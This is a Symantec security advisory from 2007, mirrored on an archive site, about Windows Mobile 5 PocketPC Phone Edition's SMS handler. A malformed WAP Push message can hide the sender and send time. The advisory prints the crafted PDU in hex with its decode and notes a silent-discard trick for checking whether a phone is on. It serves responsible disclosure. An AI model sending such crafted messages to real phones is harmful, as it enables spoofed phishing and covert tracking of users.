AOH :: HP Unsorted M :: TB13037.HTM

Microsoft WM5 PocketPC Phone Ed SMS Handler Issue



SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue
SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue



-----BEGIN PGP SIGNED MESSAGE-----=0D
Hash: SHA1=0D
=0D
=0D
=0D
                     Symantec Vulnerability Research=0D
http://www.symantec.com/research=0D 
                           Security Advisory=0D
=0D
   Advisory ID: SYMSA-2007-011=0D
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition=0D
                SMS Handler Issue With Regard to Malformed WAP Push=0D
                Messages Hiding Source=0D
Author: Ollie Whitehouse / ollie_whitehouse@symantec.com=0D 
  Release Date: 17-10-2007=0D
   Application: Microsoft Windows Mobile 5 PocketPC=0D
      Platform: Windows=0D
      Severity: Information Disclosure=0D
 Vendor status: Vendor Reviewed=0D
    CVE Number: CVE-2007-5493=0D
Reference: http://www.securityfocus.com/bid/26019=0D 
=0D
=0D
Overview:=0D
=0D
  Microsoft Windows Mobile 6 is the latest version of Microsoft's=0D
  mobile operating system. Designed for small embedded devices,=0D
  Windows Mobile is the CE feature set designed for PDA's and mobile=0D
  telephones. Microsoft Windows Mobile comes in three distinct=0D
  flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone=0D
=0D
  A vulnerability has been discovered in the SMS handler on=0D
  Windows Mobile 2005 Pocket PC Phone edition which means the sender=0D
  of the original SMS message can be masked from the recipient when=0D
  sent a specifically crafted WAP PUSH message.=0D
=0D
=0D
Details:=0D
=0D
  Symantec discovered that a slightly malformed WAP PUSH message=0D
  could be used to hide the originating sender of the message on=0D
  Windows Mobile 2005. The original PDU can be seen in [1]. The=0D
  following PDU will cause the Pocket PC Phone edition SMS handler=0D
  to incorrectly decode the PDU. The result of which is both the=0D
  sending telephone number and the sending time are incorrect.=0D
=0D
 [1] PDU (Line wrapped)=0D
  079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA=0D
  AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62=0D
  756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62=0D
  696C652E636F6D000101=0D
=0D
  The decode of the PDU can be seen in [2]. This decode was achieved=0D
with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message=0D 
  is received by a SmartPhone it will be silently discarded, which=0D
  can also be useful to an attacker who wishes to ascertain if a=0D
  cellphone is on without alerting the user through SMS delivery=0D
  receipts.=0D
=0D
  [2] Decode of PDU from PDUSpy=0D
=0D
  PDU LENGTH IS 118 BYTES=0D
  ADDRESS OF DELIVERING SMSC=0D
    NUMBER IS : +447785016005=0D
    TYPE OF NR. : International=0D
    NPI : ISDN/Telephone (E.164/163)=0D
=0D
  MESSAGE HEADER FLAGS=0D
    MESSAGE TYPE : SMS SUBMIT=0D
    REJECT DUPLICATES : NO=0D
    VALIDITY PERIOD : RELATIVE=0D
    REPLY PATH : NO=0D
    USER DATA HEADER : PRESENT=0D
    REQ. STATUS REPORT : NO=0D
    MSG REFERENCE NR. : 34 (0x22)=0D
=0D
  DESTINATION ADDRESS=0D
    NUMBER IS : +447716299660=0D
  TYPE OF NR. : International=0D
    NPI : ISDN/Telephone (E.164/163)=0D
=0D
  PROTOCOL IDENTIFIER (0x00)=0D
    MESSAGE ENTITIES : SME-to-SME=0D
    PROTOCOL USED : Implicit / SC-specific=0D
=0D
   DATA CODING SCHEME (0x04)=0D
    AUTO-DELETION : OFF=0D
    COMPRESSION : OFF=0D
    MESSAGE CLASS : NONE=0D
    ALPHABET USED : 8bit data=0D
=0D
   VALIDITY OF MESSAGE : 24.0 hrs=0D
=0D
   USER DATA PART OF SM=0D
    USER DATA LENGTH : 96 octets=0D
    UDH LENGTH : 6 octets=0D
    UDH : 05 04 0B 84 23 F0=0D
    UDH ELEMENTS : 05 - Appl. port addressing 16bit=0D
       4 (0x04) Bytes Information Element=0D
         09200 : SOURCE port is: allocated by IANA=0D
        02948 : DESTINATION port is: allocated by IANA=0D
     --- DATA ----------------------=0D
       05 04 0B 84 23 F0=0D
       USER DATA (TEXT) : %=AE=81=EA=AF=82=B4=84jE=C6=0D
     symantec=85Symantec=0D
       bulkSMS (Unregistered Ver) -=0D
       LogixMobile.com=0D
=0D
=0D
=0D
Vendor Response:=0D
=0D
  A vulnerability has been discovered in the SMS handler. If a=0D
  malicious message with no sender was received by a user on their=0D
  device, the user may be enticed in taking action or clicking the=0D
  URI that could lead to a second order attack.=0D
  =0D
  Mitigating Factors: By default Windows mobile device policy require=0D
  SI messages to be authenticated. The  Mobile Operators have the=0D
  ability to  change the policy to not requiring authentication in=0D
  order for  3rd party ring tones and other SI messages.=0D
=0D
  Microsoft will look into a different architecture in future versions.=0D
=0D
=0D
Recommendation:=0D
=0D
  Contact your mobile operator to ensure the proper policy is set on=0D
  your device.=0D
=0D
=0D
Common Vulnerabilities and Exposures (CVE) Information:=0D
=0D
The Common Vulnerabilities and Exposures (CVE) project has assigned =0D
the following names to these issues.  These are candidates for =0D
inclusion in the CVE list (http://cve.mitre.org), which standardizes =0D 
names for security problems.=0D
=0D
=0D
  CVE-2007-5493=0D
=0D
- -------Symantec Vulnerability Research Advisory Information-------=0D
=0D
For questions about this advisory, or to report an error:=0D
research@symantec.com=0D 
=0D
For details on Symantec's Vulnerability Reporting Policy: =0D
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf=0D 
=0D
Symantec Vulnerability Research Advisory Archive: =0D
http://www.symantec.com/research/ =0D 
=0D
Symantec Vulnerability Research GPG Key:=0D
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc=0D 
=0D
- -------------Symantec Product Advisory Information-------------=0D
=0D
To Report a Security Vulnerability in a Symantec Product:=0D
secure@symantec.com =0D 
=0D
For general information on Symantec's Product Vulnerability =0D
reporting and response:=0D
http://www.symantec.com/security/=0D 
=0D
Symantec Product Advisory Archive: =0D
http://www.symantec.com/avcenter/security/SymantecAdvisories.html=0D 
=0D
Symantec Product Advisory PGP Key:=0D
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc=0D 
=0D
- ---------------------------------------------------------------=0D
=0D
Copyright (c) 2007 by Symantec Corp.=0D
Permission to redistribute this alert electronically is granted =0D
as long as it is not edited in any way unless authorized by =0D
Symantec Consulting Services. Reprinting the whole or part of =0D
this alert in any medium other than electronically requires =0D
permission from research@symantec.com.=0D 
=0D
Disclaimer=0D
The information in the advisory is believed to be accurate at the =0D
time of publishing based on currently available information. Use =0D
of the information constitutes acceptance for use in an AS IS =0D
condition. There are no warranties with regard to this information. =0D
Neither the author nor the publisher accepts any liability for any =0D
direct, indirect, or consequential loss or damage arising from use =0D
of, or reliance on, this information.=0D
=0D
Symantec, Symantec products, and Symantec Consulting Services are =0D
registered trademarks of Symantec Corp. and/or affiliated companies =0D
in the United States and other countries. All other registered and =0D
unregistered trademarks represented in this document are the sole =0D
property of their respective companies/owners.=0D
-----BEGIN PGP SIGNATURE-----=0D
Version: GnuPG v1.4.7 (MingW32)=0D
=0D
iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD=0D
1qhcVHQ07YHEdgF0zUP81/k==0D
=pFeF=0D
-----END PGP SIGNATURE-----=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.